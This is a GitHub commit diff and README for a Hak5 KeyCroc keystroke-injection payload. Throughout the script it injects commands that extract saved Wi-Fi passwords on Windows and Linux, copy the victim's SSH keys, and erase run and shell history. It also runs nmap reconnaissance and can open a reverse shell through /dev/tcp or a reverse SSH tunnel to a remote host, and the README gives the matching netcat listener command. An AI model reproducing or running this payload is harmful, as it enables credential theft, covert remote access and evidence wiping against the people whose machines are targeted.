Merge pull request #62 from spywill/master

update
pull/66/head
Peaks 2024-08-29 03:55:06 -04:00 committed by GitHub
commit 21c450010b
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
4 changed files with 574 additions and 105 deletions

View File

@ -1,118 +1,468 @@
# Title: Croc_Getonline # Title: Croc_Getonline
# Description: Attempt to connect Keycroc automatically to target wifi access point # Description: Attempt to connect Keycroc automatically to target wifi access point
# Save to tools/Croc_Pot/wifipass.txt and loot/Croc_Pot/old_wifipass.txt # Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt
# Author: spywill # Author: spywill
# Version: 3.5 # Version: 4.3
# Category: Key Croc # Category: Key Croc
# Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro # Props: Cribbit, Lodrix, potong, RootJunky, dark_pyrro
MATCH (getonline_W|getonline_R|getonline_L) # getonline_W <-- MATCH word for windows, Attempt connection to access point
# getonline_L <-- MATCH word for Linux, Attempt connection to access point
# getonline_R <-- MATCH word for Raspberry pi, Attempt connection to access point
# getonline_N <-- MATCH word for connecting to known SSID ( EDIT PAYLOAD )
# getonline_F <-- MATCH word for reset wlan0 interface to last known SSID
# getonline_K <-- MATCH word for killing keycroc wlan0 interface
# getonline_S <-- MATCH word for entering ATTACKMODE HID STORAGE
# getonline_H <-- MATCH word for entering ATTACKMODE HID
# getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL
# getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET
# getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot
# getonline_T <-- MATCH word for Stopping ICMP/PORT alert
CROC_POT_DIR=(/root/udisk/loot/Croc_Pot /root/udisk/tools/Croc_Pot) # option=0 Run payload as normal
for dir in "${CROC_POT_DIR[@]}"; do [[ ! -d "$dir" ]] && mkdir "$dir" || LED B; done # option=1 Run payload as normal, open terminal on target
# option=2 Run payload as normal, start reverse SSH tunnel using SSH
# option=3 Run payload as normal, start reverse SSH tunnel using NETCAT
# option=4 Run payload as normal, open web page
wifi_pass=/root/udisk/tools/Croc_Pot/wifipass.txt MATCH getonline+_[A-Z]{1}
QUACK LOCK
if [ -f $wifi_pass ]; then #---> Edit payload option below
cat $wifi_pass >> /root/udisk/loot/Croc_Pot/old_wifipass.txt option=0
rm -f $wifi_pass keycroc_password=hak5croc
wifi_pass=/tools/wifipass.txt
web_page=https://forums.hak5.org/
#---> Edit remote host below
remote_user_name=EDIT_REMOTE_USERNAME_HERE
remote_host_ip=EDIT_REMOTE_HOST_IP_HERE
remote_host_password=EDIT_REMOTE_HOST_PASSWORD_HERE
port=7000
#---> Edit known SSID and password below
known_ssid=EDIT_KNOWN_SSID_HERE
known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE
#---> Edit recon scan on/off below & nmap
recon=off
nmap_scan="nmap -T4 -F"
recon_loot=/root/udisk/tools/Target_SSID.txt
#---> Edit ICMP/PORT alert on/off below & iptables time out
alert=off
alert_time=60
#---> Edit target password below
if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
else
target_password=ENTER_TARGET_PASSWORD_HERE
fi fi
recon_scan() {
if [ "$recon" = "on" ]; then
if [ "$LOOT" = "getonline_W" ]; then
QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\""
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"tools\Target_SSH_KEY\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }"
QUACK ENTER
QUACK DELAY 2000
elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\""
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "[ -d ~/.ssh ] && cp -fr ~/.ssh/. \"\$MOUNT_POINT/tools/Target_SSH_KEY\" || :"
QUACK ENTER
QUACK DELAY 2000
else
:
fi
elif [ "$recon" = "off" ]; then
:
else
:
fi
}
ENTER_STORAGE() {
if [ -f ~/udisk$wifi_pass ]; then
cat ~/udisk$wifi_pass >> ~/udisk/tools/old_wifipass.txt
rm -f ~/udisk$wifi_pass
fi
ATTACKMODE HID STORAGE ATTACKMODE HID STORAGE
Q DELAY 5000 QUACK DELAY 5000
LED ATTACK LED ATTACK
}
RESET_PAYLOAD() {
QUACK UNLOCK
sleep 5 ; LED OFF
killall -9 bash
killall -9 python
sleep 1
RELOAD_PAYLOADS
}
CLEAN_UP() {
if [ "$LOOT" = "getonline_W" ]; then
QUACK STRING "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*'"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "Clear-History ; Remove-Item \"\$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt\""
QUACK ENTER
QUACK DELAY 2000
elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
QUACK STRING "history -c ; rm -f ~/.bash_history"
QUACK ENTER
QUACK DELAY 2000
else
:
fi
}
calculate_network_range() {
ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)
netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
IFS=. read -r i1 i2 i3 i4 <<< "$ip_address"
IFS=. read -r m1 m2 m3 m4 <<< "$netmask"
network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24"
}
case $LOOT in case $LOOT in
getonline_W) getonline_W)
Q GUI r ENTER_STORAGE
Q DELAY 3000 QUACK GUI r
Q STRING "powershell -NoP -NonI -W Hidden" QUACK DELAY 3000
Q ENTER QUACK STRING "powershell -NoP -NonI -W Hidden"
Q DELAY 5000 QUACK ENTER
Q STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter" QUACK DELAY 5000
Q ENTER QUACK STRING "\$MOUNT_POINT = (Get-WmiObject -Class win32_volume -Filter 'label=\"KeyCroc\"').DriveLetter"
Q DELAY 3000 QUACK ENTER
Q STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'" QUACK DELAY 3000
Q ENTER QUACK STRING "\$currentSSID = (netsh wlan show interfaces | Select-String \"SSID\")[0].ToString().Trim() -replace 'SSID\s+:\s+'"
Q DELAY 2000 QUACK ENTER
Q STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1" QUACK DELAY 2000
Q ENTER QUACK STRING "\$lastObject = (netsh wlan show profile name=\"\$currentSSID\" key=clear) | Select-String \"Key Content\W+:(.+)\$\" | ForEach-Object {\$pass=\$_.Matches.Groups[1].Value.Trim(); \$_} | ForEach-Object {[PSCustomObject]@{ PROFILE_NAME=\$currentSSID;PASSWORD=\$pass }} | Select-Object -Last 1"
Q DELAY 2000 QUACK ENTER
Q STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Croc_Pot\wifipass.txt\"" QUACK DELAY 2000
Q ENTER QUACK STRING "\"\$(\$lastObject.PROFILE_NAME) \$(\$lastObject.PASSWORD)\" | Out-File -Encoding UTF8 \"\$MOUNT_POINT$wifi_pass\""
Q DELAY 5000 QUACK ENTER
Q STRING "Dismount-WindowsImage -Path \$MOUNT_POINT ; exit" QUACK DELAY 5000
Q ENTER recon_scan
CLEAN_UP
QUACK STRING "exit"
QUACK ENTER
ATTACKMODE HID
;; ;;
getonline_R) getonline_R)
Q CONTROL-ALT-d ENTER_STORAGE
Q CONTROL-ALT-t QUACK CONTROL-ALT-d
Q DELAY 2000 QUACK CONTROL-ALT-t
Q STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc" QUACK DELAY 2000
Q ENTER QUACK STRING "MOUNT_POINT=/media/\$(whoami)/KeyCroc"
Q DELAY 2000 QUACK ENTER
Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" QUACK DELAY 2000
Q ENTER QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
Q DELAY 2000 QUACK ENTER
Q STRING "SSID_pw=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')" QUACK DELAY 2000
Q ENTER QUACK STRING "SSID_password=\$(sudo sed -e '/ssid\ psk/,+1p' -ne \":a;/\$currentSSID/{n;h;p;x;ba}\" /etc/wpa_supplicant/wpa_supplicant.conf | sed 's/[[:space:]]//g' | sed 's/psk=\"\(.*\)\"/\1/')"
Q DELAY 2000 QUACK ENTER
Q STRING "echo \"\$currentSSID \$SSID_pw\" | tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" QUACK DELAY 2000
Q ENTER QUACK STRING "echo \"\$currentSSID \$SSID_password\" | tee \$MOUNT_POINT$wifi_pass"
Q DELAY 3000 QUACK ENTER
Q STRING "umount \$MOUNT_POINT ; exit" QUACK DELAY 3000
Q ENTER recon_scan
CLEAN_UP
QUACK STRING "umount \$MOUNT_POINT ; exit"
QUACK ENTER
ATTACKMODE HID
;; ;;
getonline_L) getonline_L)
if [ -f /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then ENTER_STORAGE
PC_PW=$(sed '$!d' /root/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered) QUACK CONTROL-ALT-d
else QUACK ALT-t
PC_PW=LINUX QUACK DELAY 2000
fi QUACK STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT"
Q CONTROL-ALT-d QUACK ENTER
Q ALT-t QUACK DELAY 2000
Q DELAY 2000 QUACK STRING "$target_password"
Q STRING "MOUNT_POINT=\"/mnt/usb\" ; sudo mkdir -p \$MOUNT_POINT ; sudo mount -L \"KeyCroc\" \$MOUNT_POINT" QUACK ENTER
Q ENTER QUACK DELAY 2000
Q DELAY 2000 QUACK STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')"
Q STRING "$PC_PW" QUACK ENTER
Q ENTER QUACK DELAY 2000
Q DELAY 2000 QUACK STRING "SSID_password=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')"
Q STRING "currentSSID=\$(iw dev wlan0 info | grep ssid | awk '{print \$2}')" QUACK ENTER
Q ENTER QUACK DELAY 2000
Q DELAY 2000 QUACK STRING "echo \"\$currentSSID \$SSID_password\" | sudo tee \$MOUNT_POINT$wifi_pass"
Q STRING "SSID_pw=\$(sudo grep -r '^psk=' /etc/NetworkManager/system-connections/\$currentSSID* | sed -e 's/psk=//g')" QUACK ENTER
Q ENTER QUACK DELAY 3000
Q DELAY 2000 recon_scan
Q STRING "echo \"\$currentSSID \$SSID_pw\" | sudo tee \$MOUNT_POINT/tools/Croc_Pot/wifipass.txt" CLEAN_UP
Q ENTER QUACK STRING "sudo umount \$MOUNT_POINT ; exit"
Q DELAY 3000 QUACK ENTER
Q STRING "sudo umount \$MOUNT_POINT ; exit" ATTACKMODE HID
Q ENTER
;; ;;
esac getonline_N)
LED B
sleep 2
echo "$known_ssid $known_ssid_password" > ~/udisk$wifi_pass
;;
getonline_F)
if [ -f ~/udisk$wifi_pass ]; then
LED B
sleep 2
else
LED R
RESET_PAYLOAD
fi
;;
getonline_K)
LED R
ifconfig wlan0 down
RESET_PAYLOAD
;;
getonline_S)
ATTACKMODE HID STORAGE
sleep 3
RESET_PAYLOAD
;;
getonline_H)
ATTACKMODE HID ATTACKMODE HID
sleep 3 sleep 3
RESET_PAYLOAD
;;
getonline_P)
ATTACKMODE HID SERIAL
sleep 3
RESET_PAYLOAD
;;
getonline_A)
ATTACKMODE HID AUTO_ETHERNET
sleep 3
RESET_PAYLOAD
;;
getonline_X)
LED R
rm -f /root/udisk/payloads/Croc_getonline.txt
rm -f /root/udisk$wifi_pass /root/udisk/tools/old_wifipass.txt
rm -f $recon_loot root/udisk/config.txt
rm -f /root/udisk/tools/firewall-rules-backup.txt
rm -r /root/udisk/tools/Target_SSH_KEY
apt -y remove sshpass
reboot --force
RESET_PAYLOAD
;;
getonline_T)
if ps -p "$(sed -n 1p /tmp/port_pid.txt)" || ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then
if ps -p "$(sed -n 1p /tmp/port_pid.txt)"; then
kill -9 "$(sed -n 1p /tmp/port_pid.txt)"
fi
if ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then
kill -9 "$(sed -n 1p /tmp/icmp_pid.txt)"
fi
killall -9 tcpdump
sleep 1
else
:
fi
RESET_PAYLOAD
;;
*)
LED R
sleep 1
LED OFF
RESET_PAYLOAD
;;
esac
sleep 3
word_count=$(head -n 1 "/root/udisk$wifi_pass" | sed 's/^[[:space:]]*//' | sed 's/[[:space:]]*$//' | wc -w)
if [[ $word_count -eq 2 ]]; then
ssid_to_match="$(sed 's/ .*//' /root/udisk$wifi_pass)"
matched_ssid="$(iw dev wlan0 scan | grep -Ewi "SSID: $ssid_to_match" | sed -e 's/\tSSID: //')"
sleep 1
if [[ "$ssid_to_match" =~ "$matched_ssid" ]]; then
LED SETUP LED SETUP
kill -9 $(pidof wpa_supplicant) && kill -9 $(pidof dhclient) else
LED R
RESET_PAYLOAD
fi
else
LED R
RESET_PAYLOAD
fi
kill -9 $(pidof wpa_supplicant)
kill -9 $(pidof dhclient)
ifconfig wlan0 down ifconfig wlan0 down
if [ "$LOOT" = "getonline_W" ]; then if [ "$LOOT" = "getonline_W" ]; then
sed -i '0,/./s/^.//' $wifi_pass sed -i '0,/./s/^.//' ~/udisk$wifi_pass
sed -i 's/\r//g' $wifi_pass sed -i -e '1s/^[^[:print:]]*//' ~/udisk$wifi_pass
sed -i 's/\r//g' ~/udisk$wifi_pass
fi fi
sed -i 's/\( \)*/\1/g' $wifi_pass sed -i 's/\( \)*/\1/g' ~/udisk$wifi_pass
sed -i -E -e '/^[WS]/d' -e '9 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' root/udisk/config.txt sed -i -E -e '/^[WS]/d' -e '14 a WIFI_SSID\nWIFI_PASS\nSSH ENABLE' ~/udisk/config.txt
sed -i -E -e '1{x;s#^#sed -n 1p '$wifi_pass'#e;x};10{G;s/\n(\S+).*/ \1/};11{G;s/\n\S+//}' root/udisk/config.txt sed -i -E -e '1{x;s#^#sed -n 1p '/root/udisk$wifi_pass'#e;x};15{G;s/\n(\S+).*/ \1/};16{G;s/\n\S+//}' root/udisk/config.txt
wpa_passphrase $(sed 's/ .*//' $wifi_pass) $(sed 's/.* //' $wifi_pass) > /etc/wpa_supplicant.conf wpa_passphrase $(sed 's/ .*//' ~/udisk$wifi_pass) $(sed 's/.* //' ~/udisk$wifi_pass) > /etc/wpa_supplicant.conf
ifconfig wlan0 up ifconfig wlan0 up
wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf && dhclient wlan0 wpa_supplicant -B -D nl80211 -iwlan0 -c /etc/wpa_supplicant.conf
dhclient wlan0
sleep 3 sleep 3
systemctl restart ssh.service systemctl restart ssh.service
[ : >/dev/tcp/8.8.8.8/53 ] && LED FINISH || LED R if : >/dev/tcp/8.8.8.8/53; then
if [ $option -eq 0 ]; then
:
elif [ $option -eq 1 ]; then
case "$LOOT" in
getonline_W)
QUACK GUI m
QUACK GUI r
QUACK DELAY 2000
QUACK STRING "powershell"
QUACK ENTER
QUACK DELAY 5000
;;
getonline_R)
QUACK CONTROL-ALT-d
QUACK CONTROL-ALT-t
QUACK DELAY 2000
;;
getonline_L)
QUACK CONTROL-ALT-d
QUACK ALT-t
QUACK DELAY 2000
;;
esac
QUACK STRING "ssh -o \"StrictHostKeyChecking no\" root@$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "$keycroc_password"
QUACK ENTER
elif [ $option -eq 2 ]; then
status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)"
[ $? = 0 ] || [ "$status" = installed ] && : || apt --force-yes install sshpass
sleep 1
if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
[ -f ~/.ssh/id_rsa.pub ] && : || ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa
sleep 1
sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip"
sleep 3
ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip
else
LED R
sleep 1
fi
elif [ $option -eq 3 ]; then
if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
/bin/bash -i >& /dev/tcp/"$remote_host_ip"/"$port" 0>&1 &
else
LED R
sleep 1
fi
elif [ $option -eq 4 ]; then
if [ "$LOOT" = "getonline_W" ]; then
QUACK GUI d
QUACK GUI r
QUACK DELAY 2000
QUACK STRING "powershell"
QUACK ENTER
QUACK DELAY 2000
QUACK STRING "Start-Process $web_page & exit"
QUACK ENTER
elif [ "$LOOT" = "getonline_R" ]; then
QUACK CONTROL-ALT-d
QUACK CONTROL-ALT-t
QUACK DELAY 2000
QUACK STRING "xdg-open $web_page & exit"
QUACK ENTER
elif [ "$LOOT" = "getonline_L" ]; then
QUACK CONTROL-ALT-d
QUACK ALT-t
QUACK DELAY 2000
QUACK STRING "xdg-open $web_page & exit"
QUACK ENTER
fi
else
LED FINISH
fi
LED FINISH
else
LED R
fi
if [ "$recon" = "on" ]; then
LED C SLOW
echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot
ssid_to_match=$(sed 's/ .*//' ~/udisk$wifi_pass)
iw dev wlan0 scan | egrep -Ewi 'BSS|signal:|SSID:|DS Parameter set:|Country:|freq:|Manufacturer:|Model Number:|Serial Number:|Device name:' | grep -A5 -B3 "SSID: $ssid_to_match" >> $recon_loot
echo -ne "\n\nReachable IP on local network:\n\n" >> $recon_loot
ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot
cat /etc/resolv.conf | grep nameserver >> $recon_loot
perform_nmap_scan() {
echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot
$nmap_scan $network_range >> $recon_loot
}
calculate_network_range
perform_nmap_scan
echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot
curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot
echo -ne "\n\n" >> $recon_loot
elif [ "$recon" = "off" ]; then
:
else
:
fi
if [ "$alert" = "on" ]; then
icmp_alert() {
calculate_network_range
sleep 1
until (tcpdump -c 1 -n '((icmp and icmp[0]=8) or (udp and src net '$network_range' and (dst port 33434 or dst port 33534))) and not src host '$ip_address''); do
:
done
LED R SLOW
iptables -F
iptables -A OUTPUT -p icmp --icmp-type any -j DROP
sleep $alert_time
iptables-restore < /root/udisk/tools/firewall-rules-backup.txt
LED B ; sleep 2 ; LED OFF
icmp_alert & echo -ne $! > /tmp/icmp_pid.txt
}
port_alert() {
ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)
file=/tmp/tcpdump.out
until (tcpdump -i wlan0 -c 20 'tcp[tcpflags] & (tcp-syn) != 0 and not src host '$ip_address'' -w $file -G 10); do
:
done
LED R SLOW
iptables -F
iptables -P INPUT DROP
iptables -P OUTPUT DROP
iptables -P FORWARD DROP
sleep $alert_time
iptables-restore < /root/udisk/tools/firewall-rules-backup.txt
LED B ; sleep 2 ; LED OFF
port_alert & echo -ne $! > /tmp/port_pid.txt
}
iptables-save > /root/udisk/tools/firewall-rules-backup.txt
icmp_alert & echo -ne $! > /tmp/icmp_pid.txt
port_alert & echo -ne $! > /tmp/port_pid.txt
LED B
elif [ "$alert" = "off" ]; then
:
else
:
fi
sleep 3 sleep 3
LED OFF LED OFF
QUACK UNLOCK

View File

@ -1,8 +1,9 @@
# Croc_Getonline # Croc_Getonline
## INTRODUCTION : ## INTRODUCTION :
- This project is developed for the HAK5 KeyCroc - This project is developed for the HAK5 KeyCroc.
- Attempt to connect Keycroc automatically to target wifi access point. - Attempt to connect Keycroc automatically to target wifi access point. OPTIONS Nmap, Iw, and Curl to gather essential network information and/or start Reverse SSH tunnel.
- Payload will use KeyCroc MATCH command to perform specific tasks.
* **TESTED ON** * **TESTED ON**
- Windows 10 - Windows 10
@ -12,29 +13,99 @@
## INSTALLATION : ## INSTALLATION :
- Enter arming mode on your keycroc to install file. - Enter arming mode on your keycroc to install file.
- Download the Croc_getonline.txt payload and Place this in the KeyCroc **payload folder** - Download the Croc_getonline.txt payload and Place this in the KeyCroc **payload folder**.
## STARTING GETONLINE : ## STARTING CROC_GETONLINE :
- After install plug into target and type in anywhere After install plug into target and type in anywhere:
- **getonline_W** <-- MATCH word for windows - **`getonline_W`** MATCH word for windows, Attempt connection to wifi access point
- **getonline_L** <-- MATCH word for Linux - **`getonline_L`** MATCH word for Linux, Attempt connection to wifi access point
- **getonline_R** <-- MATCH word for Raspberry pi - **`getonline_R`** MATCH word for Raspberry pi, Attempt connection to wifi access point
- When the payload is done running the LED will light up green - **`getonline_N`** MATCH word for connecting to known SSID ( EDIT PAYLOAD )
- Keycroc should now be connected to target wifi access point - **`getonline_F`** MATCH word for reset wlan0 interface to last known SSID
- NOTE: for linux edit payload for passwd needed for sudo permission - **`getonline_K`** MATCH word for killing keycroc wlan0 interface
- **`getonline_S`** MATCH word for entering ATTACKMODE HID STORAGE
- **`getonline_H`** MATCH word for entering ATTACKMODE HID
- **`getonline_P`** MATCH word for entering ATTACKMODE HID SERIAL
- **`getonline_A`** MATCH word for entering ATTACKMODE HID AUTO_ETHERNET
- **`getonline_X`** MATCH word for Remove Croc_Getonline payload, contents and reboot
- **`getonline_T`** MATCH word for Stopping ICMP/PORT alert
* **LED STATUS**
- **`LED WHITE`** Entering ATTACKMODE
- **`LED ATTACK`** Retrieving wifi access point credentials
- **`LED SETUP`** Configuring keycroc wlan0 interface to wifi access point
- **`LED GREEN`** Successful connection to wifi access point
- **`LED RED`** Payload failed
- **`LED CYAN`** Performing recon scan
- **`LED RED FLASH`** ICMP/PORT alert
**NOTE:** for linux edit payload for password needed for sudo permission.
## PAYLOAD OPTIONS :
Editing payload variable options:
- **`option=0`**
- This option will run payload as normal, attempt to connect Keycroc to wifi access point.
- **`option=1`**
- This option will run payload as normal, after a successful connection open terminal on target and start ssh session.
- ( EDIT PAYLOAD FOR KEYCROC PASSWORD )
- **`option=2`**
- This option will run payload as normal, after a successful connection attempt a connection to remote_host using SSH.
- ( EDIT PAYLOAD FOR REMOTE_HOST, USER_NAME, IP, PASSWORD ON REMOTE_HOST ENTER THIS COMMAND "ssh root@localhost -p port#" )
- SSHPASS is a requirement for this option, payload will attempt to install if not installed.
- **`option=3`**
- This option will run payload as normal, after a successful connection attempt a connection to remote_host using netcat.
- ( EDIT PAYLOAD FOR REMOTE_HOST, IP START LISTENER ON REMOTE_HOST WITH THIS COMMAND "nc -lnvp PORT# -s IP_REMOTE_HOST" )
- **`option=4`**
- This option will run payload as normal, after a successful connection open default browser and start web page.
- ( EDIT PAYLOAD FOR WEB SITE DEFAULT https://forums.hak5.org )
* **Configuring RECON scan with recon=on and recon=off**
The options recon=off and recon=on play a key role in performing basic recon scans using Nmap, Iw, and Curl.
- **`recon=off`**
- Suppresses active reconnaissance to maintain stealth.
- Useful for discreet scanning in sensitive environments.
- **`recon=on`**
- Initiates basic network reconnaissance scans.
- Utilizes Nmap, Iw, and Curl to gather essential network information and save to /root/udisk/tools/Target_SSID.txt.
* **Configuring ICMP and Port Alerts with alert=on and alert=off**
- **`alert=on`**
- ICMP Alert: It blocks outgoing ICMP and UDP packets with specific destination ports (33434 and 33534) for a minute and then restores the original firewall rules.
- Port Alert: It drops incoming TCP packets with the SYN flag set for a minute and then restores the original firewall rules.
- **`alert=off`**
- If alert is set to off, the script does nothing ( : represents a null command in bash ). No alerts are set up.
To summarize, ICMP and Port alerts when alert=on by using the icmp_alert() and port_alert() functions, respectively. It saves the current firewall rules to a backup file and runs the alert functions in the background, storing their respective PIDs in temporary files. If alert=off, the script does nothing related to alerts.
## PAYLOAD INFO : ## PAYLOAD INFO :
**PowerShell script that performs the following actions:** - **PowerShell script that performs the following actions:**
Gets the drive letter of a volume with the label "KeyCroc" and assigns it to the $MOUNT_POINT variable using the Get-WmiObject cmdlet. Gets the drive letter of a volume with the label "KeyCroc" and assigns it to the $MOUNT_POINT variable using the Get-WmiObject cmdlet.
Gets the SSID of the currently connected wireless network and assigns it to the $currentSSID variable using the netsh wlan command and Select-String cmdlet. Gets the SSID of the currently connected wireless network and assigns it to the $currentSSID variable using the netsh wlan command and Select-String cmdlet.
Gets the password for the current wireless network and assigns it to the $lastObject variable using the netsh wlan command, Select-String cmdlet, and a series of ForEach-Object and Select-Object cmdlets. The password is then formatted as a string and written to a file at the location specified by $MOUNT_POINT and exits the script.
Gets the password for the current wireless network and assigns it to the $lastObject variable using the netsh wlan command, Select-String cmdlet, and a series of ForEach-Object and Select-Object cmdlets. The password is then formatted as a string and written to a file at the location specified by $MOUNT_POINT. - **Bash script that performs the following actions:**
Dismounts the volume at $MOUNT_POINT using the Dismount-WindowsImage cmdlet, and exits the script.
**Bash script that performs the following actions:**
Sets the mount point for a volume with the label "KeyCroc" to /media/$(whoami)/KeyCroc. Sets the mount point for a volume with the label "KeyCroc" to /media/$(whoami)/KeyCroc.
Gets the SSID of the currently connected wireless network using the iw command, grep, and awk to extract the SSID. Gets the SSID of the currently connected wireless network using the iw command, grep, and awk to extract the SSID.
@ -42,7 +113,7 @@ Gets the password for the current wireless network by searching for the SSID in
Writes the SSID and password to a file located at $MOUNT_POINT using tee. Writes the SSID and password to a file located at $MOUNT_POINT using tee.
Unmounts the volume at $MOUNT_POINT using umount, and exits the script. Unmounts the volume at $MOUNT_POINT using umount, and exits the script.
**Bash script that performs the following actions:** - **Bash script that performs the following actions:**
Sets the mount point for a volume with the label "KeyCroc" to /mnt/usb. Sets the mount point for a volume with the label "KeyCroc" to /mnt/usb.
Creates the mount point directory using mkdir with the -p flag to create the directory if it does not exist. Creates the mount point directory using mkdir with the -p flag to create the directory if it does not exist.
@ -54,24 +125,24 @@ Unmounts the volume at $MOUNT_POINT using umount, and exits the script.
Overall, this script retrieving the Wi-Fi password for the currently connected network and storing it in a file located on a specific mounted volume with the label "KeyCroc". Overall, this script retrieving the Wi-Fi password for the currently connected network and storing it in a file located on a specific mounted volume with the label "KeyCroc".
**-Sed command that performs the following actions:** - **Sed command that performs the following actions:**
By default, sed reads each line of a file. For each cycle, it removes the newline, places the result in the pattern space, goes through a sequence of commands, re-appends the newline and prints the result e.g. sed '' file replicates the cat command. The sed commands are usually placed between '...' and represent a cycle, thus: By default, sed reads each line of a file. For each cycle, it removes the newline, places the result in the pattern space, goes through a sequence of commands, re-appends the newline and prints the result e.g. sed '' file replicates the cat command. The sed commands are usually placed between '...' and represent a cycle, thus:
1{x;s#^#sed -n 1p wifipass.txt#e;x} - 1{x;s#^#sed -n 1p wifipass.txt#e;x}
1{..} executes the commands between the ellipses on the first line of config.txt. Commands are separated by ;'s 1{..} executes the commands between the ellipses on the first line of wifipass.txt. Commands are separated by ;'s
x sed provides two buffers. After removing the newline that delimits each line of a file, the result is placed in the pattern space. Another buffer is provided empty, at the start of each invocation, called the hold space. The x swaps the pattern space for the hold space. x sed provides two buffers. After removing the newline that delimits each line of a file, the result is placed in the pattern space. Another buffer is provided empty, at the start of each invocation, called the hold space. The x swaps the pattern space for the hold space.
s#^#sed -n 1p wifipass.txt this inserts another sed invocation into the empty hold space and evaluates it by the use of the e flag. The second invocation turns off implicit printing (-n option) and then prints line 1 of wifipass.txt only. s#^#sed -n 1p wifipass.txt this inserts another sed invocation into the empty hold space and evaluates it by the use of the e flag. The second invocation turns off implicit printing (-n option) and then prints line 1 of wifipass.txt only.
x the hold space is now swapped with the pattern space.Thus, line 1 of wifipass.txt is placed in the hold space. x the hold space is now swapped with the pattern space.Thus, line 1 of wifipass.txt is placed in the hold space.
10{G;s/\n(\S+).*/ \1/} - 10{G;s/\n(\S+).*/ \1/}
10{..} executes the commands between the ellipses on the tenth line of config.txt. 10{..} executes the commands between the ellipses on the tenth line of config.txt.
G append the contents of hold space to the pattern space using a newline as a separator. G append the contents of hold space to the pattern space using a newline as a separator.
